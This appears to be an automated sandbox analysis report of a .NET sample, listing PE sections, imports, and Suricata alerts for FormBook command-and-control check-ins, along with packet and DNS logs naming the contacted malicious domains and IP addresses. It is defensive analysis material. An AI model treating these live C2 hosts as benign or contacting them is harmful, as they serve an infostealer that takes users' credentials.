                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd8c240x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xda0000x1294.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xd6cbc0xd6e005268247293306d507e395ffa60e90e9cFalse0.886126790648633data7.7215249828363035IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xda0000x12940x1400bd4b7f39a28280be41bed0c7cc50b61cFalse0.7892578125data6.743184939445049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xdc0000xc0x20087280ab4538d2061aefd5dd307bb1237False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xda0c80xed4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9444151738672286
                                                            RT_GROUP_ICON0xdafac0x14data1.05
                                                            RT_VERSION0xdafd00x2bedata0.4658119658119658

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-10T22:05:23.195867+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149717161.97.142.14480TCP
                                                            2025-01-10T22:05:23.195867+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149717161.97.142.14480TCP
                                                            2025-01-10T22:05:40.031039+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149718107.155.56.3080TCP
                                                            2025-01-10T22:05:42.564699+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149719107.155.56.3080TCP
                                                            2025-01-10T22:05:45.117302+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149720107.155.56.3080TCP
                                                            2025-01-10T22:05:47.835328+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149721107.155.56.3080TCP
                                                            2025-01-10T22:05:47.835328+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149721107.155.56.3080TCP
                                                            2025-01-10T22:05:54.441084+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114972218.139.62.22680TCP
                                                            2025-01-10T22:05:56.994740+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114972318.139.62.22680TCP
                                                            2025-01-10T22:05:59.836770+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114972418.139.62.22680TCP
                                                            2025-01-10T22:06:02.464946+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114972518.139.62.22680TCP
                                                            2025-01-10T22:06:02.464946+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114972518.139.62.22680TCP
                                                            2025-01-10T22:06:16.294566+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149726209.74.77.10780TCP
                                                            2025-01-10T22:06:18.786010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149727209.74.77.10780TCP
                                                            2025-01-10T22:06:21.321304+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149728209.74.77.10780TCP
                                                            2025-01-10T22:06:23.881170+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149729209.74.77.10780TCP
                                                            2025-01-10T22:06:23.881170+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149729209.74.77.10780TCP
                                                            2025-01-10T22:06:30.558773+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149730154.205.156.2680TCP
                                                            2025-01-10T22:06:33.246935+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149731154.205.156.2680TCP
                                                            2025-01-10T22:06:35.902236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149732154.205.156.2680TCP
                                                            2025-01-10T22:06:38.397632+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149733154.205.156.2680TCP
                                                            2025-01-10T22:06:38.397632+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149733154.205.156.2680TCP
                                                            2025-01-10T22:06:43.968585+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497343.33.130.19080TCP
                                                            2025-01-10T22:06:46.874309+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11497353.33.130.19080TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 10, 2025 22:05:22.588563919 CET4971780192.168.2.11161.97.142.144
                                                            Jan 10, 2025 22:05:22.593523979 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:22.593652964 CET4971780192.168.2.11161.97.142.144
                                                            Jan 10, 2025 22:05:22.604598999 CET4971780192.168.2.11161.97.142.144
                                                            Jan 10, 2025 22:05:22.609559059 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:23.195647001 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:23.195669889 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:23.195683956 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:23.195693970 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:23.195709944 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:23.195867062 CET4971780192.168.2.11161.97.142.144
                                                            Jan 10, 2025 22:05:23.195913076 CET4971780192.168.2.11161.97.142.144
                                                            Jan 10, 2025 22:05:23.201090097 CET4971780192.168.2.11161.97.142.144
                                                            Jan 10, 2025 22:05:23.205954075 CET8049717161.97.142.144192.168.2.11
                                                            Jan 10, 2025 22:05:39.061618090 CET4971880192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:39.066538095 CET8049718107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:39.066637039 CET4971880192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:39.082874060 CET4971880192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:39.087948084 CET8049718107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:40.030945063 CET8049718107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:40.030973911 CET8049718107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:40.031039000 CET4971880192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:40.589775085 CET4971880192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:41.612721920 CET4971980192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:41.617757082 CET8049719107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:41.617867947 CET4971980192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:41.634426117 CET4971980192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:41.639308929 CET8049719107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:42.564593077 CET8049719107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:42.564637899 CET8049719107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:42.564698935 CET4971980192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:43.136662960 CET4971980192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:44.174513102 CET4972080192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:44.182102919 CET8049720107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:44.182179928 CET4972080192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:44.365710974 CET4972080192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:44.370800972 CET8049720107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:44.371037006 CET8049720107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:45.117206097 CET8049720107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:45.117234945 CET8049720107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:45.117301941 CET4972080192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:45.870877981 CET4972080192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:46.890050888 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:46.894951105 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:46.895056963 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:46.911207914 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:46.916069984 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835131884 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835191011 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835226059 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835263014 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835295916 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835328102 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:47.835355997 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835390091 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835422993 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:47.835428953 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835447073 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:47.835459948 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835464954 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:47.835493088 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:47.835540056 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:47.945499897 CET4972180192.168.2.11107.155.56.30
                                                            Jan 10, 2025 22:05:47.950537920 CET8049721107.155.56.30192.168.2.11
                                                            Jan 10, 2025 22:05:53.494033098 CET4972280192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:53.498810053 CET804972218.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:53.498904943 CET4972280192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:53.514230013 CET4972280192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:53.519011974 CET804972218.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:54.440963030 CET804972218.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:54.441011906 CET804972218.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:54.441083908 CET4972280192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:55.030384064 CET4972280192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:56.046307087 CET4972380192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:56.052570105 CET804972318.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:56.052711010 CET4972380192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:56.068679094 CET4972380192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:56.073806047 CET804972318.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:56.994529009 CET804972318.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:56.994576931 CET804972318.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:56.994740009 CET4972380192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:57.574188948 CET4972380192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:58.871961117 CET4972480192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:58.877074003 CET804972418.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:58.877199888 CET4972480192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:58.946949005 CET4972480192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:05:58.951958895 CET804972418.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:58.952033043 CET804972418.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:59.836528063 CET804972418.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:59.836642027 CET804972418.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:05:59.836770058 CET4972480192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:00.480424881 CET4972480192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:01.503603935 CET4972580192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:01.508707047 CET804972518.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:06:01.508797884 CET4972580192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:01.520277977 CET4972580192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:01.525310040 CET804972518.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:06:02.464771986 CET804972518.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:06:02.464798927 CET804972518.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:06:02.464946032 CET4972580192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:02.478682995 CET4972580192.168.2.1118.139.62.226
                                                            Jan 10, 2025 22:06:02.483536005 CET804972518.139.62.226192.168.2.11
                                                            Jan 10, 2025 22:06:15.626805067 CET4972680192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:15.636576891 CET8049726209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:15.636658907 CET4972680192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:15.651770115 CET4972680192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:15.660430908 CET8049726209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:16.294430971 CET8049726209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:16.294470072 CET8049726209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:16.294565916 CET4972680192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:17.167771101 CET4972680192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:18.186852932 CET4972780192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:18.191797972 CET8049727209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:18.191905022 CET4972780192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:18.205348969 CET4972780192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:18.210133076 CET8049727209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:18.785733938 CET8049727209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:18.785912991 CET8049727209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:18.786010027 CET4972780192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:19.714726925 CET4972780192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:20.733709097 CET4972880192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:20.738639116 CET8049728209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:20.738709927 CET4972880192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:20.755026102 CET4972880192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:20.759862900 CET8049728209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:20.760003090 CET8049728209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:21.321096897 CET8049728209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:21.321247101 CET8049728209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:21.321304083 CET4972880192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:22.261668921 CET4972880192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:23.280785084 CET4972980192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:23.285645962 CET8049729209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:23.285751104 CET4972980192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:23.295053959 CET4972980192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:23.300007105 CET8049729209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:23.880858898 CET8049729209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:23.880923033 CET8049729209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:23.881170034 CET4972980192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:23.884179115 CET4972980192.168.2.11209.74.77.107
                                                            Jan 10, 2025 22:06:23.889029026 CET8049729209.74.77.107192.168.2.11
                                                            Jan 10, 2025 22:06:29.025732040 CET4973080192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:29.030575991 CET8049730154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:29.030637980 CET4973080192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:29.046247005 CET4973080192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:29.051130056 CET8049730154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:30.558773041 CET4973080192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:30.564121008 CET8049730154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:30.570559978 CET4973080192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:31.767193079 CET4973180192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:31.772036076 CET8049731154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:31.772131920 CET4973180192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:31.822845936 CET4973180192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:31.827728987 CET8049731154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:33.246718884 CET8049731154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:33.246876001 CET8049731154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:33.246934891 CET4973180192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:33.339787006 CET4973180192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:34.366801977 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:34.371656895 CET8049732154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:34.371773958 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:34.387556076 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:34.392368078 CET8049732154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:34.392517090 CET8049732154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:35.902235985 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:35.903554916 CET8049732154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:35.903611898 CET8049732154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:35.903654099 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:35.903683901 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:35.907109976 CET8049732154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:35.907191038 CET4973280192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:36.921869040 CET4973380192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:36.926805019 CET8049733154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:36.926955938 CET4973380192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:36.938612938 CET4973380192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:36.943939924 CET8049733154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:38.397444963 CET8049733154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:38.397543907 CET8049733154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:38.397631884 CET4973380192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:38.444039106 CET4973380192.168.2.11154.205.156.26
                                                            Jan 10, 2025 22:06:38.448976994 CET8049733154.205.156.26192.168.2.11
                                                            Jan 10, 2025 22:06:43.490154982 CET4973480192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:43.494968891 CET80497343.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:43.495183945 CET4973480192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:43.511842012 CET4973480192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:43.516799927 CET80497343.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:43.968492985 CET80497343.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:43.968509912 CET80497343.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:43.968585014 CET4973480192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:45.027301073 CET4973480192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:46.405549049 CET4973580192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:46.410453081 CET80497353.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:46.410523891 CET4973580192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:46.426377058 CET4973580192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:46.431790113 CET80497353.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:46.874176979 CET80497353.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:46.874208927 CET80497353.33.130.190192.168.2.11
                                                            Jan 10, 2025 22:06:46.874309063 CET4973580192.168.2.113.33.130.190
                                                            Jan 10, 2025 22:06:47.933459044 CET4973580192.168.2.113.33.130.190

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 10, 2025 22:05:22.555126905 CET6144253192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:05:22.581259966 CET53614421.1.1.1192.168.2.11
                                                            Jan 10, 2025 22:05:38.249721050 CET5381753192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:05:39.058895111 CET53538171.1.1.1192.168.2.11
                                                            Jan 10, 2025 22:05:52.973481894 CET6457953192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:05:53.491429090 CET53645791.1.1.1192.168.2.11
                                                            Jan 10, 2025 22:06:07.488329887 CET6314253192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:06:07.498230934 CET53631421.1.1.1192.168.2.11
                                                            Jan 10, 2025 22:06:15.609394073 CET5636853192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:06:15.624454975 CET53563681.1.1.1192.168.2.11
                                                            Jan 10, 2025 22:06:28.895590067 CET5037153192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:06:29.023272991 CET53503711.1.1.1192.168.2.11
                                                            Jan 10, 2025 22:06:43.453152895 CET5911853192.168.2.111.1.1.1
                                                            Jan 10, 2025 22:06:43.487240076 CET53591181.1.1.1192.168.2.11

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 10, 2025 22:05:22.555126905 CET192.168.2.111.1.1.10x8615Standard query (0)www.070001325.xyzA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:05:38.249721050 CET192.168.2.111.1.1.10x9227Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:05:52.973481894 CET192.168.2.111.1.1.10x7eddStandard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:07.488329887 CET192.168.2.111.1.1.10x5ba7Standard query (0)www.epitomize.shopA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:15.609394073 CET192.168.2.111.1.1.10x1f86Standard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:28.895590067 CET192.168.2.111.1.1.10xc69cStandard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:43.453152895 CET192.168.2.111.1.1.10x29aaStandard query (0)www.likesharecomment.netA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 10, 2025 22:05:22.581259966 CET1.1.1.1192.168.2.110x8615No error (0)www.070001325.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:05:39.058895111 CET1.1.1.1192.168.2.110x9227No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:05:53.491429090 CET1.1.1.1192.168.2.110x7eddNo error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 10, 2025 22:05:53.491429090 CET1.1.1.1192.168.2.110x7eddNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:05:53.491429090 CET1.1.1.1192.168.2.110x7eddNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:07.498230934 CET1.1.1.1192.168.2.110x5ba7Name error (3)www.epitomize.shopnonenoneA (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:15.624454975 CET1.1.1.1192.168.2.110x1f86No error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:29.023272991 CET1.1.1.1192.168.2.110xc69cNo error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:43.487240076 CET1.1.1.1192.168.2.110x29aaNo error (0)www.likesharecomment.netlikesharecomment.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 10, 2025 22:06:43.487240076 CET1.1.1.1192.168.2.110x29aaNo error (0)likesharecomment.net3.33.130.190A (IP address)IN (0x0001)false
                                                            Jan 10, 2025 22:06:43.487240076 CET1.1.1.1192.168.2.110x29aaNo error (0)likesharecomment.net15.197.148.33A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.070001325.xyz
